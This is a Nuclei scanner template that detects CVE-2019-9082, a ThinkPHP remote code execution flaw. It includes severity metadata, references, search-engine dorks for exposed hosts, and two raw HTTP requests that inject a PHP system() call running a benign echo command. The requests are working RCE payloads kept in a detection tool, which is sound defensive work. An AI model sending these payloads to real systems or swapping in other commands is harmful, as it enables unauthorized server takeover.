id: CVE-2019-9082

info:
  name: ThinkPHP < 3.2.4 - Remote Code Execution
  author: 0xanis
  severity: high
  description: |
    ThinkPHP before 3.2.4, as used in Open Source BMS v1.1.1 and other products, allows Remote Command Execution via the s parameter in index.php through the invokefunction functionality.
  impact: |
    Attackers can execute arbitrary system commands on the server without authentication, potentially leading to full system compromise.
  remediation: |
    Update to ThinkPHP 3.2.4 or later, or apply vendor patches.
  reference:
    - https://github.com/xyl-tools/open_source_bms/issues/33
    - http://packetstormsecurity.com/files/157218/ThinkPHP-5.0.23-Remote-Code-Execution.html
    - https://www.exploit-db.com/exploits/46488/
    - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/thinkphp_rce.rb
    - https://nvd.nist.gov/vuln/detail/CVE-2019-9082
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cwe-id: CWE-94
    cpe: cpe:2.3:a:opensourcebms:open_source_background_management_system:1.1.1:*:*:*:*:*:*:*
    epss-score: 0.94207
    epss-percentile: 0.99925
  metadata:
    verified: true
    max-request: 2
    fofa-query: app="ThinkPHP"
    google-query: inurl:"index.php?s=" "thinkphp"
  tags: cve,cve2019,thinkphp,open_source_bms,none_cms,rce,kev,vkev

http:
  - raw:
      - |
        GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20thinkphp%20%7C%20rev HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /index.php?s=captcha HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo%20thinkphp%20%7C%20rev

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "phpkniht")'
          - 'status_code == 200 || status_code == 500'
        condition: and
# digest: 4a0a0047304502204d8dd8755b6f96146e40070c36f4c3df629db7e54f5efe36262c2ac88c38eb55022100e69815f653cb355b983922eb6bbc2e61ced33d530ac2fc77e6a2689ed3168943:922c64590222798bb761d5b6d8e72950